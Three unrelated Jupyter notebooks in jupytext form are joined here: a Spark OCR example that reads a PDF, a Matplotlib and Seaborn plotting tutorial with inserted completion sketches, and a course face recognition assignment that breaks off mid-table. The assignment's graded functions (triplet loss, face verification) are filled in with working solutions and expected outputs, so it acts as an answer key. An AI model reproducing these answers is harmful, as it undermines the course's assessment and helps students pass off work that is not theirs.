# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "4cdea391-1ca0-4bca-b5b1-a41595ef3bbb"}
# # Example of Spark OCR usage
# * Load example PDF
# * Preview it
# * Recognize text
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "51a053dd-a1bf-49e2-9a0f-e41135a1832d"}
# ## Import OCR transformers and utils
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "4f1f8def-74a8-47bf-b729-6c003e04a73d"}
from sparkocr.transformers import *
from sparkocr.databricks import display_images
from pyspark.ml import PipelineModel
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "cbbc423b-1389-4ac0-ab3d-61f0243a3e82"}
# ## Define OCR transformers and pipeline
# * Transform binary data to the Image schema using [BinaryToImage](https://nlp.johnsnowlabs.com/docs/en/ocr_pipeline_components#binarytoimage). More details about the Image schema are available [here](https://nlp.johnsnowlabs.com/docs/en/ocr_structures#image-schema).
# * Recognize text using [ImageToText](https://nlp.johnsnowlabs.com/docs/en/ocr_pipeline_components#imagetotext) transformer.
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "c78d8b8d-e3b5-4fdd-af81-af9531938ff9"}
def pipeline():
    # Transform the PDF document to the struct image format
    pdf_to_image = PdfToImage()
    pdf_to_image.setInputCol("content")
    pdf_to_image.setOutputCol("image")
    pdf_to_image.setResolution(200)
    pdf_to_image.setPartitionNum(8)
    # Run OCR
    ocr = ImageToText()
    ocr.setInputCol("image")
    ocr.setOutputCol("text")
    ocr.setConfidenceThreshold(65)
    pipeline = PipelineModel(stages=[
        pdf_to_image,
        ocr
    ])
    return pipeline
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "c0e3e7cf-d79c-4a2f-a0b4-6400f01f8cea"}
# ## Copy example files from OCR resources to DBFS
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "17bc34bb-d14c-4493-8595-4ecb6376f588"}
import pkg_resources
import shutil, os
ocr_examples = "/dbfs/FileStore/examples"
resources = pkg_resources.resource_filename('sparkocr', 'resources')
if not os.path.exists(ocr_examples):
    shutil.copytree(resources, ocr_examples)
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "4013da1d-c86f-48ae-8196-28e674f1a588"}
# %fs ls /FileStore/examples/ocr/pdfs
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "360e7100-12fe-47c0-9f72-11798a8e9d96"}
# ## Read PDF document as binary file from DBFS
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "ae479179-1f41-4066-9373-881cf5a5671d"}
pdf_example = '/FileStore/examples/ocr/pdfs/test_document.pdf'
pdf_example_df = spark.read.format("binaryFile").load(pdf_example).cache()
display(pdf_example_df)
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "f8f321ba-31e8-431a-a3c7-e6f0e3814745"}
# ## Preview PDF using _display_images_ function
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "3094cb0b-37a0-4c2f-b2f1-20b6005aa7b4"}
display_images(PdfToImage().setOutputCol("image").transform(pdf_example_df), limit=3)
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "010a180e-d833-49ed-828b-45f983cf2ba6"}
# ## Run OCR pipelines
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "5e5a5675-90f2-426c-bc11-80c429a5a2fb"}
result = pipeline().transform(pdf_example_df).cache()
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "3dc6f259-d4e8-40c8-a5af-8aa879afc32f"}
# ## Display results
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "e3dab3ce-54b3-4ba1-9efa-ca784af01493"}
display(result.select("pagenum", "text", "confidence"))
# + [markdown] application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "39b3cf48-e023-4da4-81a1-dc76eb9e940f"}
# ## Clear cache
# + application/vnd.databricks.v1+cell={"title": "", "showTitle": false, "inputWidgets": {}, "nuid": "24b15a99-fad1-4b17-adb4-a5a4dbfbde43"}
result.unpersist()
pdf_example_df.unpersist()
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Advanced Plotting Methods
#
# - Introduce techniques for adding an extra data dimension to a plot with colour and symbols
# - Highlighting and layering data on a plot
# - Post-production editing
# ---
# # 1. Import Packages
import matplotlib.pyplot as plt
import pandas as pd
# ---
# # 2. Import Data Using Pandas
# import excel data as a Pandas dataframe
tvz = pd.read_excel('Data/TVZ.xlsx', sheet_name='Data')
tvz.head(2)
# ---
# # 3. Adding Another Dimension with Colour Scales
#
# We can add a third dimension to our x/y plots by applying a colour scale (colour map).
# +
# assign Pandas dataframe columns
x = tvz.EffectivePorosity_VolPercent
y = tvz.SampleDepth_mMD
z = tvz.Vp_mps
fig, ax = plt.subplots(1,1,figsize=(8,3))
ax.scatter(
x,
y,
# what do you think goes here to colour data by z?
)
# scatter plot kwargs
# s=20 # size, float
# c='k' # named colour, hex code, or numeric values (see advanced notebook)
# edgecolors='k'
# linewidths=0.5
# cmap='colour-map-name', append _r to the name to reverse the colour map
# Perceptually uniform colour maps
# these are recommended
# viridis
# plasma
# inferno
# magma
# cividis
# Sequential colourmaps
# Greys
# Blues
# GnBu
# OrRd
# Other colour maps
# these are not recommended
# hsv
# gist_rainbow
# rainbow
# plot the colour bar
#fig.colorbar() # this will not work until we adjust the code
# colour bar kwargs
# shrink=0.5 # make the bar shorter
# fraction=0.15 # amount of axis that the bar will occupy
# aspect=10 # make the bar fatter using smaller numbers
ax.set_ylim(3500,0)
ax.set_ylabel('Depth [m-VD]')
ax.set_xlabel('Porosity [v/v]');
# -
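A possible completion of the cell above, offered as one sketch rather than the answer key: pass the third variable to the `c` kwarg, pick a perceptually uniform `cmap`, and hand the collection returned by `scatter` to `fig.colorbar`. Synthetic arrays stand in for the `EffectivePorosity_VolPercent`, `SampleDepth_mMD` and `Vp_mps` columns so the sketch runs without the Excel file.

```python
import numpy as np
import matplotlib
matplotlib.use("Agg")  # off-screen backend so the sketch runs anywhere
import matplotlib.pyplot as plt

# synthetic stand-ins for porosity (x), depth (y) and Vp (z)
x = np.linspace(5, 50, 30)
y = np.linspace(100, 3000, 30)
z = 1500 + 20 * x

fig, ax = plt.subplots(1, 1, figsize=(8, 3))
sc = ax.scatter(x, y, c=z, cmap='viridis', edgecolors='k', linewidths=0.5)
cbar = fig.colorbar(sc, ax=ax, shrink=0.8)  # colorbar needs the mappable returned by scatter
cbar.set_label('Vp [m/s]')
ax.set_ylim(3500, 0)
ax.set_ylabel('Depth [m-VD]')
ax.set_xlabel('Porosity [v/v]')
```

The key point is that `fig.colorbar()` alone cannot work: it needs the mappable (`sc`) so it knows which colour map and data range to draw.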
# ---
# # 4. Colour Scales: The Puzzling and the Perceptually Uniform
#
# There is a dizzying array of colour scales to choose from and it's easy to get carried away. We must choose wisely or we risk distorting how our data are perceived.
#
# Refer to [this paper](https://www.nature.com/articles/s41467-020-19160-7) to get a feel for how data are distorted by colour.
#
# Explore how perception is distorted by colour scale selection using [this application](https://github.com/mycarta/Colormap-distorsions-Panel-app#how-to-use-the-app) (Hint: click on 'launch app' and wait for it to load).
#
# Matplotlib provides [a useful resource](https://matplotlib.org/stable/tutorials/colors/colormaps.html) that helps with colour scale selection.
#
# **Rule of thumb: Avoid rainbow and prefer perceptually uniform.**
from IPython import display
display.Image("https://imgs.xkcd.com/comics/painbow_award.png")
# ---
# # 5. Advanced Scatter Plots with Seaborn
#
# Seaborn is a powerful plotting tool that works well with Pandas.
#
# It's ideal for generating static plots for reports, presentations and publication.
#
# [Seaborn example gallery](https://seaborn.pydata.org/examples/index.html)
# +
import seaborn as sns
fig, ax = plt.subplots(1,1,figsize=(8,3))
sns.scatterplot(
x='EffectivePorosity_VolPercent', # Pandas column name for x data
y='SampleDepth_mMD', # Pandas column name for y data
data=tvz, # Pandas dataframe name
ax=ax, # name of the axis that the seaborn plot goes in
s=90, # marker size
hue='RockCode', # marker colour
style='AlterationAssemblage', # marker style
legend=False, # turns legend on and off
)
ax.set_xlim(0,60)
ax.set_ylim(3500,0)
ax.set_xlabel('Porosity [v/v]')
ax.set_ylabel('Depth [m-VD]')
# Place legend right of the axis
#ax.legend(
# loc='center left',
# bbox_to_anchor=(1.05, 0.45),
# ncol=1,
#);
# -
# ---
# # 6. Plot Element Layering
#
# Sometimes you want to place one set of data on top of another in a plot, or all of the data on top of the grid. We use zorder to do this.
#
# There are some quirks in how zorder interacts with grids, so a bit of trial and error is typically required.
# +
x = [3,5]
y = [10,12]
fig, ax = plt.subplots(1,1,figsize=(5,5))
ax.plot(
x,
y,
linewidth=5,
color='r',
)
ax.scatter(
x,
y,
marker='o',
s=400,
# add kwarg here
)
ax.grid(linewidth=3)
# -
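One way to fill in the missing kwarg (an assumption, not the only answer): give the scatter a `zorder` above the line's, since Matplotlib draws higher values on top, and use `set_axisbelow(True)` as one trick for keeping the grid underneath.

```python
import matplotlib
matplotlib.use("Agg")  # off-screen backend so the sketch runs anywhere
import matplotlib.pyplot as plt

x = [3, 5]
y = [10, 12]
fig, ax = plt.subplots(1, 1, figsize=(5, 5))
ax.plot(x, y, linewidth=5, color='r', zorder=2)      # lines default to zorder 2
pts = ax.scatter(x, y, marker='o', s=400, zorder=3)  # higher zorder draws markers on top of the line
ax.grid(linewidth=3)
ax.set_axisbelow(True)  # push the grid and ticks behind the plot artists
```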
# ---
# # 7. Highlights and Fills
#
# Three methods that can be used to highlight data on a plot.
#
# ## 7.1 Fill Between Lines
#
# Fill between lines in either the [x direction](https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.fill_betweenx.html#matplotlib.pyplot.fill_betweenx) or [y direction](https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.fill_between.html)
# +
fig, (ax0, ax1) = plt.subplots(1,2,figsize=(6,3), sharey=True)
plt.tight_layout()
# fill between lines in the y axis direction
x = [2, 3, 4, 5, 6]
y1 = [22, 30, 20, 33, 40]
y2 = [30, 35, 25, 20, 30]
ax0.plot(x, y1)
ax0.plot(x, y2)
#ax0.fill_between(x, y1, y2, alpha=0.2)
# Fill between lines in the x axis direction
y = [20, 25, 30, 35, 40]
x1 = [2, 2, 3, 6, 4]
x2 = [5, 4, 4, 5, 5]
ax1.plot(x1, y)
ax1.plot(x2, y)
#ax1.fill_betweenx(y, x1, x2, alpha=0.2)
# -
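With the two commented fill calls switched on, the cell behaves roughly like this self-contained sketch (same toy data as above):

```python
import matplotlib
matplotlib.use("Agg")  # off-screen backend so the sketch runs anywhere
import matplotlib.pyplot as plt

fig, (ax0, ax1) = plt.subplots(1, 2, figsize=(6, 3), sharey=True)
# fill between lines in the y axis direction
x = [2, 3, 4, 5, 6]
y1 = [22, 30, 20, 33, 40]
y2 = [30, 35, 25, 20, 30]
ax0.plot(x, y1)
ax0.plot(x, y2)
band_y = ax0.fill_between(x, y1, y2, alpha=0.2)   # shades the gap between the two curves
# fill between lines in the x axis direction
y = [20, 25, 30, 35, 40]
x1 = [2, 2, 3, 6, 4]
x2 = [5, 4, 4, 5, 5]
ax1.plot(x1, y)
ax1.plot(x2, y)
band_x = ax1.fill_betweenx(y, x1, x2, alpha=0.2)  # same idea, horizontal direction
```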
# ## 7.2 Horizontal or Vertical Lines
#
# Add [horizontal](https://matplotlib.org/stable/api/_as_gen/matplotlib.axes.Axes.hlines.html?highlight=hlines#matplotlib.axes.Axes.hlines) or [vertical](https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.vlines.html) lines
#
# +
fig, ax = plt.subplots(1,1,figsize=(5,3))
plt.tight_layout()
x = [2, 3, 4, 5, 6]
y = [25, 30, 35, 30, 40]
ax.scatter(x, y)
# add a horizontal line
ax.hlines(
30, # y axis location
2, # start of line on x axis
6, # end of line on x axis
)
# add a vertical line
ax.vlines(
3, # x axis location
25, # start of line on y axis
35, # end of line on y axis
);
# kwargs to try
# color = '' # named colour or hex value
# linewidth = 0.5 # float
# linestyle = '' # '-' '--' '-.' ':'
# -
# ## 7.3 Coloured or Hashed Box
#
# Shade a zone on the plot that spans either the [x axis](https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.axvspan.html) or [y axis](https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.axhspan.html) direction
# +
fig, ax = plt.subplots(1,1,figsize=(5,3))
plt.tight_layout()
x = [2, 3, 4, 5, 6]
y = [25, 30, 35, 30, 40]
ax.scatter(x, y)
# span x axis
'''
ax.axvspan(
    3, # min on x axis
    4, # max on x axis
    #ymin=0.3, # bottom of box, proportion from 0-1
    #ymax=0.9, # top of box, proportion from 0-1
    #alpha=0.2,
)
'''
# span y axis
'''
ax.axhspan(
    35,
    37.5,
    alpha=0.2,
    # add kwarg xmin and xmax
)
''';
# other kwargs to try
# color = '' # named colour or hex value
# hatch = '' # '/' '\' '|' '-' '+' 'x' 'o' 'O' '.' '*'
# edgecolor = '' # named colour or hex value
# facecolor = '' # named colour or hex value
# -
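Uncommenting the two span blocks gives roughly this sketch; the kwarg values are illustrative, not prescribed:

```python
import matplotlib
matplotlib.use("Agg")  # off-screen backend so the sketch runs anywhere
import matplotlib.pyplot as plt

x = [2, 3, 4, 5, 6]
y = [25, 30, 35, 30, 40]
fig, ax = plt.subplots(1, 1, figsize=(5, 3))
ax.scatter(x, y)
vband = ax.axvspan(3, 4, ymin=0.3, ymax=0.9, alpha=0.2)  # box spanning x=3..4, partial height
hband = ax.axhspan(35, 37.5, alpha=0.2, hatch='/')       # hatched band spanning y=35..37.5
```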
# ---
# # 8. Where to From Here?
#
# Illustrator or other graphics package for finishing demo.
#
#
# **Happy plotting!**
# ---
# Tutorial created by [<NAME>](https://www.cubicearth.nz/)
#
#
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Face Recognition
#
# In this assignment, you will build a face recognition system. Many of the ideas presented here are from [FaceNet](https://arxiv.org/pdf/1503.03832.pdf). In lecture, we also talked about [DeepFace](https://research.fb.com/wp-content/uploads/2016/11/deepface-closing-the-gap-to-human-level-performance-in-face-verification.pdf).
#
# Face recognition problems commonly fall into two categories:
#
# - **Face Verification** - "is this the claimed person?". For example, at some airports, you can pass through customs by letting a system scan your passport and then verifying that you (the person carrying the passport) are the correct person. A mobile phone that unlocks using your face is also using face verification. This is a 1:1 matching problem.
# - **Face Recognition** - "who is this person?". For example, the video lecture showed a [face recognition video](https://www.youtube.com/watch?v=wr4rx0Spihs) of Baidu employees entering the office without needing to otherwise identify themselves. This is a 1:K matching problem.
#
# FaceNet learns a neural network that encodes a face image into a vector of 128 numbers. By comparing two such vectors, you can then determine if two pictures are of the same person.
#
# **In this assignment, you will:**
# - Implement the triplet loss function
# - Use a pretrained model to map face images into 128-dimensional encodings
# - Use these encodings to perform face verification and face recognition
#
# #### Channels-first notation
#
# * In this exercise, we will be using a pre-trained model which represents ConvNet activations using a **"channels first"** convention, as opposed to the "channels last" convention used in lecture and previous programming assignments.
# * In other words, a batch of images will be of shape $(m, n_C, n_H, n_W)$ instead of $(m, n_H, n_W, n_C)$.
# * Both of these conventions have a reasonable amount of traction among open-source implementations; there isn't a uniform standard yet within the deep learning community.
# ## <font color='darkblue'>Updates</font>
#
# #### If you were working on the notebook before this update...
# * The current notebook is version "3a".
# * You can find your original work saved in the notebook with the previous version name ("v3")
# * To view the file directory, go to the menu "File->Open", and this will open a new tab that shows the file directory.
#
# #### List of updates
# * `triplet_loss`: Additional Hints added.
# * `verify`: Hints added.
# * `who_is_it`: corrected hints given in the comments.
# * Spelling and formatting updates for easier reading.
#
# #### Load packages
# Let's load the required packages.
# +
from keras.models import Sequential
from keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate
from keras.models import Model
from keras.layers.normalization import BatchNormalization
from keras.layers.pooling import MaxPooling2D, AveragePooling2D
from keras.layers.merge import Concatenate
from keras.layers.core import Lambda, Flatten, Dense
from keras.initializers import glorot_uniform
from keras.engine.topology import Layer
from keras import backend as K
K.set_image_data_format('channels_first')
import cv2
import os
import numpy as np
from numpy import genfromtxt
import pandas as pd
import tensorflow as tf
from fr_utils import *
from inception_blocks_v2 import *
# %matplotlib inline
# %load_ext autoreload
# %autoreload 2
np.set_printoptions(threshold=np.nan)
# -
# ## 0 - Naive Face Verification
#
# In Face Verification, you're given two images and you have to determine if they are of the same person. The simplest way to do this is to compare the two images pixel-by-pixel. If the distance between the raw images is less than a chosen threshold, it may be the same person!
#
# <img src="images/pixel_comparison.png" style="width:380px;height:150px;">
# <caption><center> <u> <font color='purple'> **Figure 1** </u></center></caption>
# * Of course, this algorithm performs really poorly, since the pixel values change dramatically due to variations in lighting, orientation of the person's face, even minor changes in head position, and so on.
# * You'll see that rather than using the raw image, you can learn an encoding, $f(img)$.
# * By using an encoding for each image, an element-wise comparison produces a more accurate judgement as to whether two pictures are of the same person.
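The naive pixel baseline can be sketched in a few lines of NumPy; the arrays below are synthetic stand-ins for real photos, and the threshold is arbitrary:

```python
import numpy as np

rng = np.random.default_rng(0)
img_a = rng.random((96, 96, 3))                   # "person A"
img_b = img_a + rng.normal(0, 0.02, img_a.shape)  # same scene with a small lighting change
img_c = rng.random((96, 96, 3))                   # an unrelated image

def naive_same_person(u, v, threshold=30.0):
    """Compare raw pixels with an L2 distance; the threshold is arbitrary."""
    return np.linalg.norm(u - v) < threshold

print(naive_same_person(img_a, img_b))  # small perturbation, distance stays small
print(naive_same_person(img_a, img_c))  # unrelated pixels, distance is large
```

This only works when nothing but the identity changes between shots, which is exactly why the learned encoding $f(img)$ below is needed.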
# ## 1 - Encoding face images into a 128-dimensional vector
#
# ### 1.1 - Using a ConvNet to compute encodings
#
# The FaceNet model takes a lot of data and a long time to train. So following common practice in applied deep learning, let's load weights that someone else has already trained. The network architecture follows the Inception model from [Szegedy *et al.*](https://arxiv.org/abs/1409.4842). We have provided an inception network implementation. You can look in the file `inception_blocks_v2.py` to see how it is implemented (do so by going to "File->Open..." at the top of the Jupyter notebook. This opens the file directory that contains the '.py' file).
# The key things you need to know are:
#
# - This network uses 96x96 dimensional RGB images as its input. Specifically, it inputs a face image (or batch of $m$ face images) as a tensor of shape $(m, n_C, n_H, n_W) = (m, 3, 96, 96)$
# - It outputs a matrix of shape $(m, 128)$ that encodes each input face image into a 128-dimensional vector
#
# Run the cell below to create the model for face images.
FRmodel = faceRecoModel(input_shape=(3, 96, 96))
print("Total Params:", FRmodel.count_params())
# **Expected Output**
# <table>
# <center>
# Total Params: 3743280
# </center>
# </table>
#
# By using a 128-neuron fully connected layer as its last layer, the model ensures that the output is an encoding vector of size 128. You then use the encodings to compare two face images as follows:
#
# <img src="images/distance_kiank.png" style="width:680px;height:250px;">
# <caption><center> <u> <font color='purple'> **Figure 2**: <br> </u> <font color='purple'> By computing the distance between two encodings and thresholding, you can determine if the two pictures represent the same person</center></caption>
#
# So, an encoding is a good one if:
# - The encodings of two images of the same person are quite similar to each other.
# - The encodings of two images of different persons are very different.
#
# The triplet loss function formalizes this, and tries to "push" the encodings of two images of the same person (Anchor and Positive) closer together, while "pulling" the encodings of two images of different persons (Anchor, Negative) further apart.
#
# <img src="images/triplet_comparison.png" style="width:280px;height:150px;">
# <br>
# <caption><center> <u> <font color='purple'> **Figure 3**: <br> </u> <font color='purple'> In the next part, we will call the pictures from left to right: Anchor (A), Positive (P), Negative (N) </center></caption>
#
#
# ### 1.2 - The Triplet Loss
#
# For an image $x$, we denote its encoding $f(x)$, where $f$ is the function computed by the neural network.
#
# <img src="images/f_x.png" style="width:380px;height:150px;">
#
# <!--
# We will also add a normalization step at the end of our model so that $\mid \mid f(x) \mid \mid_2 = 1$ (means the vector of encoding should be of norm 1).
# !-->
#
# Training will use triplets of images $(A, P, N)$:
#
# - A is an "Anchor" image--a picture of a person.
# - P is a "Positive" image--a picture of the same person as the Anchor image.
# - N is a "Negative" image--a picture of a different person than the Anchor image.
#
# These triplets are picked from our training dataset. We will write $(A^{(i)}, P^{(i)}, N^{(i)})$ to denote the $i$-th training example.
#
# You'd like to make sure that an image $A^{(i)}$ of an individual is closer to the Positive $P^{(i)}$ than to the Negative image $N^{(i)}$ by at least a margin $\alpha$:
#
# $$\mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2 + \alpha < \mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2$$
#
# You would thus like to minimize the following "triplet cost":
#
# $$\mathcal{J} = \sum^{m}_{i=1} \large[ \small \underbrace{\mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2}_\text{(1)} - \underbrace{\mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2}_\text{(2)} + \alpha \large ] \small_+ \tag{3}$$
#
# Here, we are using the notation "$[z]_+$" to denote $max(z,0)$.
#
# Notes:
# - The term (1) is the squared distance between the anchor "A" and the positive "P" for a given triplet; you want this to be small.
# - The term (2) is the squared distance between the anchor "A" and the negative "N" for a given triplet; you want this to be relatively large. It has a minus sign preceding it because minimizing the negative of the term is the same as maximizing that term.
# - $\alpha$ is called the margin. It is a hyperparameter that you pick manually. We will use $\alpha = 0.2$.
#
# Most implementations also rescale the encoding vectors to have an L2 norm equal to one (i.e., $\mid \mid f(img)\mid \mid_2 = 1$); you won't have to worry about that in this assignment.
#
# **Exercise**: Implement the triplet loss as defined by formula (3). Here are the 4 steps:
# 1. Compute the distance between the encodings of "anchor" and "positive": $\mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2$
# 2. Compute the distance between the encodings of "anchor" and "negative": $\mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2$
# 3. Compute the formula per training example: $ \mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2 - \mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2 + \alpha$
# 4. Compute the full formula by taking the max with zero and summing over the training examples:
# $$\mathcal{J} = \sum^{m}_{i=1} \large[ \small \mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2 - \mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2+ \alpha \large ] \small_+ \tag{3}$$
#
# #### Hints
# * Useful functions: `tf.reduce_sum()`, `tf.square()`, `tf.subtract()`, `tf.add()`, `tf.maximum()`.
# * For steps 1 and 2, you will sum over the entries of $\mid \mid f(A^{(i)}) - f(P^{(i)}) \mid \mid_2^2$ and $\mid \mid f(A^{(i)}) - f(N^{(i)}) \mid \mid_2^2$.
# * For step 4 you will sum over the training examples.
#
# #### Additional Hints
# * Recall that the square of the L2 norm is the sum of the squared differences: $||x - y||_{2}^{2} = \sum_{i=1}^{N}(x_{i} - y_{i})^{2}$
# * Note that the `anchor`, `positive` and `negative` encodings are of shape `(m,128)`, where m is the number of training examples and 128 is the number of elements used to encode a single example.
# * For steps 1 and 2, you will maintain the number of `m` training examples and sum along the 128 values of each encoding.
# * [tf.reduce_sum](https://www.tensorflow.org/api_docs/python/tf/math/reduce_sum) has an `axis` parameter. This chooses along which axis the sums are applied.
# * Note that one way to choose the last axis in a tensor is to use negative indexing (`axis=-1`).
# * In step 4, when summing over training examples, the result will be a single scalar value.
# * For `tf.reduce_sum` to sum across all axes, keep the default value `axis=None`.
# +
# GRADED FUNCTION: triplet_loss
def triplet_loss(y_true, y_pred, alpha = 0.2):
    """
    Implementation of the triplet loss as defined by formula (3)
    Arguments:
    y_true -- true labels, required when you define a loss in Keras; you don't need it in this function.
    y_pred -- python list containing three objects:
            anchor -- the encodings for the anchor images, of shape (None, 128)
            positive -- the encodings for the positive images, of shape (None, 128)
            negative -- the encodings for the negative images, of shape (None, 128)
    Returns:
    loss -- real number, value of the loss
    """
    anchor, positive, negative = y_pred[0], y_pred[1], y_pred[2]
    ### START CODE HERE ### (≈ 4 lines)
    # Step 1: Compute the (encoding) distance between the anchor and the positive
    pos_dist = tf.reduce_sum((anchor - positive)**2, axis=-1)
    # Step 2: Compute the (encoding) distance between the anchor and the negative
    neg_dist = tf.reduce_sum((anchor - negative)**2, axis=-1)
    # Step 3: Subtract the two previous distances and add alpha.
    basic_loss = pos_dist - neg_dist + alpha
    # Step 4: Take the maximum of basic_loss and 0.0. Sum over the training examples.
    loss = tf.reduce_sum(tf.maximum(basic_loss, 0.0))
    ### END CODE HERE ###
    return loss
# -
with tf.Session() as test:
    tf.set_random_seed(1)
    y_true = (None, None, None)
    y_pred = (tf.random_normal([3, 128], mean=6, stddev=0.1, seed=1),
              tf.random_normal([3, 128], mean=1, stddev=1, seed=1),
              tf.random_normal([3, 128], mean=3, stddev=4, seed=1))
    loss = triplet_loss(y_true, y_pred)
    print("loss = " + str(loss.eval()))
# **Expected Output**:
#
# <table>
# <tr>
# <td>
# **loss**
# </td>
# <td>
# 528.143
# </td>
# </tr>
#
# </table>
# ## 2 - Loading the pre-trained model
#
# FaceNet is trained by minimizing the triplet loss. But since training requires a lot of data and a lot of computation, we won't train it from scratch here. Instead, we load a previously trained model. Load a model using the following cell; this might take a couple of minutes to run.
FRmodel.compile(optimizer = 'adam', loss = triplet_loss, metrics = ['accuracy'])
load_weights_from_FaceNet(FRmodel)
# Here are some examples of distances between the encodings between three individuals:
#
# <img src="images/distance_matrix.png" style="width:380px;height:200px;">
# <br>
# <caption><center> <u> <font color='purple'> **Figure 4**:</u> <br> <font color='purple'> Example of distance outputs between three individuals' encodings</center></caption>
#
# Let's now use this model to perform face verification and face recognition!
# ## 3 - Applying the model
# You are building a system for an office building where the building manager would like to offer facial recognition to allow the employees to enter the building.
#
# You'd like to build a **Face verification** system that gives access to the list of people who live or work there. To get admitted, each person has to swipe an ID card (identification card) to identify themselves at the entrance. The face recognition system then checks that they are who they claim to be.
# ### 3.1 - Face Verification
#
# Let's build a database containing one encoding vector for each person who is allowed to enter the office. To generate the encoding we use `img_to_encoding(image_path, model)`, which runs the forward propagation of the model on the specified image.
#
# Run the following code to build the database (represented as a python dictionary). This database maps each person's name to a 128-dimensional encoding of their face.
database = {}
database["danielle"] = img_to_encoding("images/danielle.png", FRmodel)
database["younes"] = img_to_encoding("images/younes.jpg", FRmodel)
database["tian"] = img_to_encoding("images/tian.jpg", FRmodel)
database["andrew"] = img_to_encoding("images/andrew.jpg", FRmodel)
database["kian"] = img_to_encoding("images/kian.jpg", FRmodel)
database["dan"] = img_to_encoding("images/dan.jpg", FRmodel)
database["sebastiano"] = img_to_encoding("images/sebastiano.jpg", FRmodel)
database["bertrand"] = img_to_encoding("images/bertrand.jpg", FRmodel)
database["kevin"] = img_to_encoding("images/kevin.jpg", FRmodel)
database["felix"] = img_to_encoding("images/felix.jpg", FRmodel)
database["benoit"] = img_to_encoding("images/benoit.jpg", FRmodel)
database["arnaud"] = img_to_encoding("images/arnaud.jpg", FRmodel)
# Now, when someone shows up at your front door and swipes their ID card (thus giving you their name), you can look up their encoding in the database, and use it to check if the person standing at the front door matches the name on the ID.
#
# **Exercise**: Implement the verify() function which checks if the front-door camera picture (`image_path`) is actually the person called "identity". You will have to go through the following steps:
# 1. Compute the encoding of the image from `image_path`.
# 2. Compute the distance between this encoding and the encoding of the identity image stored in the database.
# 3. Open the door if the distance is less than 0.7, else do not open it.
#
#
# * As presented above, you should use the L2 distance [np.linalg.norm](https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.norm.html).
# * (Note: In this implementation, compare the L2 distance, not the square of the L2 distance, to the threshold 0.7.)
#
# #### Hints
# * `identity` is a string that is also a key in the `database` dictionary.
# * `img_to_encoding` has two parameters: the `image_path` and `model`.
# +
# GRADED FUNCTION: verify
def verify(image_path, identity, database, model):
    """
    Function that verifies if the person on the "image_path" image is "identity".
    Arguments:
    image_path -- path to an image
    identity -- string, name of the person whose identity you'd like to verify. Has to be an employee who works in the office.
    database -- python dictionary mapping names of allowed people (strings) to their encodings (vectors).
    model -- your Inception model instance in Keras
    Returns:
    dist -- distance between the image_path image and the image of "identity" in the database.
    door_open -- True, if the door should open. False otherwise.
    """
    ### START CODE HERE ###
    # Step 1: Compute the encoding for the image. Use img_to_encoding() -- see example above. (≈ 1 line)
    encoding = img_to_encoding(image_path, model)
    # Step 2: Compute distance with identity's image (≈ 1 line)
    dist = np.linalg.norm(encoding - database[identity])
    # Step 3: Open the door if dist < 0.7, else don't open (≈ 3 lines)
    if dist < 0.7:
        print("It's " + str(identity) + ", welcome in!")
        door_open = True
    else:
        print("It's not " + str(identity) + ", please go away")
        door_open = False
    ### END CODE HERE ###
    return dist, door_open
# -
# Younes is trying to enter the office and the camera takes a picture of him ("images/camera_0.jpg"). Let's run your verification algorithm on this picture:
#
# <img src="images/camera_0.jpg" style="width:100px;height:100px;">
verify("images/camera_0.jpg", "younes", database, FRmodel)
# **Expected Output**:
#
# <table>
# <tr>
# <td>
